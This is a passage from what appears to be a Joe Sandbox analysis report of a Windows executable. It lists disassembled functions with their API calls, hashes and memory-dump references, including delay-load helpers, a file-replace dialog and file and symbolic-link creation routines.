                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 1586f9af7d3365274489b055dedaf8a5afa0b1266f419f7e9d7413ae0caa8c0d
                  • Instruction ID: c9c2b633d98e859f6b536f34366c0ac13638edfeb5b6d1c358f4acf02fc228f5
                  • Opcode Fuzzy Hash: 1586f9af7d3365274489b055dedaf8a5afa0b1266f419f7e9d7413ae0caa8c0d
                  • Instruction Fuzzy Hash: AAA0029616D1067C711C71516D16D3A265CC4C5B61330451AB806D45465548584A7431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4DAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DAB2
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 6d0e471c74333b086adae3c1967863559718c63b51d846755f79312728cc8362
                  • Instruction ID: c9c2b633d98e859f6b536f34366c0ac13638edfeb5b6d1c358f4acf02fc228f5
                  • Opcode Fuzzy Hash: 6d0e471c74333b086adae3c1967863559718c63b51d846755f79312728cc8362
                  • Instruction Fuzzy Hash: AAA0029616D1067C711C71516D16D3A265CC4C5B61330451AB806D45465548584A7431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4DACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DAB2
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 9002d525ff8d8d6d59bc5a63996ae8742328c30886889205738a6af09e855f22
                  • Instruction ID: c9c2b633d98e859f6b536f34366c0ac13638edfeb5b6d1c358f4acf02fc228f5
                  • Opcode Fuzzy Hash: 9002d525ff8d8d6d59bc5a63996ae8742328c30886889205738a6af09e855f22
                  • Instruction Fuzzy Hash: AAA0029616D1067C711C71516D16D3A265CC4C5B61330451AB806D45465548584A7431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4DAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DAB2
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: a17eeb092f7df4aa29ccf51f27160a44721cde10760ce237562e69c086b65b0e
                  • Instruction ID: 52b6b7259cc4efdc3dfa7c7f0bc4b046b53fbb430fb30b0ef58f89e3480744b8
                  • Opcode Fuzzy Hash: a17eeb092f7df4aa29ccf51f27160a44721cde10760ce237562e69c086b65b0e
                  • Instruction Fuzzy Hash: 95A0029626D5057C715C7151AD16D3A265CD4D1B21330451AB806D45465548584A7431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4DBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DBD5
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 56185f83d3f1dac3bdb3c6dc365720bbb043fea7c1b9b73bbe4b85f15c5df102
                  • Instruction ID: 6dab4783d43df9d448252100b4f94f7f37f7f2cef79eda88ced38c1e1dff75bf
                  • Opcode Fuzzy Hash: 56185f83d3f1dac3bdb3c6dc365720bbb043fea7c1b9b73bbe4b85f15c5df102
                  • Instruction Fuzzy Hash: CEA011AA2AC00BBC300822002C2BE3A2A2CC0C0FA0330880EB80AC0082AA808C883032
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4DC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DC36
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 309b4c0e46bd128399d1a8b5bc17e3482b512b90bfb9ef6ade9514b612878c12
                  • Instruction ID: 8ead20a2cd32e7b51887ca609bf8f5ba78cd060561d6f69c83bdc19ef99c57cf
                  • Opcode Fuzzy Hash: 309b4c0e46bd128399d1a8b5bc17e3482b512b90bfb9ef6ade9514b612878c12
                  • Instruction Fuzzy Hash: B0A0029656D106BC311C61516D66D76371CC4D5B61330491AB906D455165855C497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4DC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DC36
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: a0543036df0653a0017f463252311d8054b37568b7b74574109774776f2f4f43
                  • Instruction ID: 8ead20a2cd32e7b51887ca609bf8f5ba78cd060561d6f69c83bdc19ef99c57cf
                  • Opcode Fuzzy Hash: a0543036df0653a0017f463252311d8054b37568b7b74574109774776f2f4f43
                  • Instruction Fuzzy Hash: B0A0029656D106BC311C61516D66D76371CC4D5B61330491AB906D455165855C497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4DC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DBD5
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 8071cf501869f66844aeadf947f30cd168e1d4dfea5a1920e45fae0d7c889428
                  • Instruction ID: 6dab4783d43df9d448252100b4f94f7f37f7f2cef79eda88ced38c1e1dff75bf
                  • Opcode Fuzzy Hash: 8071cf501869f66844aeadf947f30cd168e1d4dfea5a1920e45fae0d7c889428
                  • Instruction Fuzzy Hash: CEA011AA2AC00BBC300822002C2BE3A2A2CC0C0FA0330880EB80AC0082AA808C883032
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4DC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DBD5
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 5d738aa68587fc1481cb6e7c1de3a9ae19e54b49c6a922f1fa93b87ac4c45e78
                  • Instruction ID: 6dab4783d43df9d448252100b4f94f7f37f7f2cef79eda88ced38c1e1dff75bf
                  • Opcode Fuzzy Hash: 5d738aa68587fc1481cb6e7c1de3a9ae19e54b49c6a922f1fa93b87ac4c45e78
                  • Instruction Fuzzy Hash: CEA011AA2AC00BBC300822002C2BE3A2A2CC0C0FA0330880EB80AC0082AA808C883032
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4DC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DBD5
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 77d5cb900b9f4e233a801bce9e7db9e4c0ab13cd4035236952c246bb6097af74
                  • Instruction ID: 6dab4783d43df9d448252100b4f94f7f37f7f2cef79eda88ced38c1e1dff75bf
                  • Opcode Fuzzy Hash: 77d5cb900b9f4e233a801bce9e7db9e4c0ab13cd4035236952c246bb6097af74
                  • Instruction Fuzzy Hash: CEA011AA2AC00BBC300822002C2BE3A2A2CC0C0FA0330880EB80AC0082AA808C883032
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4A322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                  Download Yara Rule
                  APIs
                  • SetCurrentDirectoryW.KERNELBASE(?,00F4A587,C:\Users\user\Desktop,00000000,00F7946A,00000006), ref: 00F4A326
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: CurrentDirectory
                  • String ID:
                  • API String ID: 1611563598-0
                  • Opcode ID: 6f15725c7f0e0d590a3741bb55a943f07f007899923e05c922cfa9e786afaa0d
                  • Instruction ID: 2f1cd25fb34b5b63dfafa7e84d4b2fcee0f1a8d6370c9e37185dedd9a9381fe4
                  • Opcode Fuzzy Hash: 6f15725c7f0e0d590a3741bb55a943f07f007899923e05c922cfa9e786afaa0d
                  • Instruction Fuzzy Hash: 7EA0123019400A578A000B30CC09C1576505761702F008620B002C00A0CB308814B500
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Function 00F4B8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00F3130B: GetDlgItem.USER32(00000000,00003021), ref: 00F3134F
                    • Part of subcall function 00F3130B: SetWindowTextW.USER32(00000000,00F635B4), ref: 00F31365
                  • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00F4B971
                  • EndDialog.USER32(?,00000006), ref: 00F4B984
                  • GetDlgItem.USER32(?,0000006C), ref: 00F4B9A0
                  • SetFocus.USER32(00000000), ref: 00F4B9A7
                  • SetDlgItemTextW.USER32(?,00000065,?), ref: 00F4B9E1
                  • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00F4BA18
                  • FindFirstFileW.KERNEL32(?,?), ref: 00F4BA2E
                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F4BA4C
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F4BA5C
                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00F4BA78
                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00F4BA94
                  • _swprintf.LIBCMT ref: 00F4BAC4
                    • Part of subcall function 00F3400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F3401D
                  • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00F4BAD7
                  • FindClose.KERNEL32(00000000), ref: 00F4BADE
                  • _swprintf.LIBCMT ref: 00F4BB37
                  • SetDlgItemTextW.USER32(?,00000068,?), ref: 00F4BB4A
                  • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00F4BB67
                  • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00F4BB87
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F4BB97
                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00F4BBB1
                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00F4BBC9
                  • _swprintf.LIBCMT ref: 00F4BBF5
                  • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00F4BC08
                  • _swprintf.LIBCMT ref: 00F4BC5C
                  • SetDlgItemTextW.USER32(?,00000069,?), ref: 00F4BC6F
                    • Part of subcall function 00F4A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00F4A662
                    • Part of subcall function 00F4A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,00F6E600,?,?), ref: 00F4A6B1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                  • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                  • API String ID: 797121971-1840816070
                  • Opcode ID: 62fab993abff7d983cd6b072d61b051a47796c3d3fdbf11b56179fbec6975549
                  • Instruction ID: 00026eaf6bcec999e66acec7a3376c5f6d886282e8071c8756badf9650f4d737
                  • Opcode Fuzzy Hash: 62fab993abff7d983cd6b072d61b051a47796c3d3fdbf11b56179fbec6975549
                  • Instruction Fuzzy Hash: 8A919772648348BBD721DBA0DC89FFB7BACEB4A710F040819F749D2191DB75E604A762
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00F37191
                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00F372F1
                  • CloseHandle.KERNEL32(00000000), ref: 00F37301
                    • Part of subcall function 00F37BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00F37C04
                    • Part of subcall function 00F37BF5: GetLastError.KERNEL32 ref: 00F37C4A
                    • Part of subcall function 00F37BF5: CloseHandle.KERNEL32(?), ref: 00F37C59
                  • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00F3730C
                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00F3741A
                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00F37446
                  • CloseHandle.KERNEL32(?), ref: 00F37457
                  • GetLastError.KERNEL32 ref: 00F37467
                  • RemoveDirectoryW.KERNEL32(?), ref: 00F374B3
                  • DeleteFileW.KERNEL32(?), ref: 00F374DB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                  • API String ID: 3935142422-3508440684
                  • Opcode ID: 19ef4505131ee431f0ed1a6f676f3cfbb4954cbcd8e904ca7724a2ef61322ef7
                  • Instruction ID: 9e01c53faf2005597534b6ea1198e0390d62c7563dbfa0b332cb43a216486e69
                  • Opcode Fuzzy Hash: 19ef4505131ee431f0ed1a6f676f3cfbb4954cbcd8e904ca7724a2ef61322ef7
                  • Instruction Fuzzy Hash: 60B1E3B1D04319EADF20EF64DC41BEE7B78AF04324F044169F949E7142DB78AA49EB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F33281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: H_prolog_memcmp
                  • String ID: CMT$h%u$hc%u
                  • API String ID: 3004599000-3282847064
                  • Opcode ID: 1c5643018d37112e7d91b0104b51129c14cea8c917f159d713fcdf35fae6566a
                  • Instruction ID: 63daffce550f443afc6d9eacb52ad6ad5e811bda7fab9a29d2939c7bb7559d37
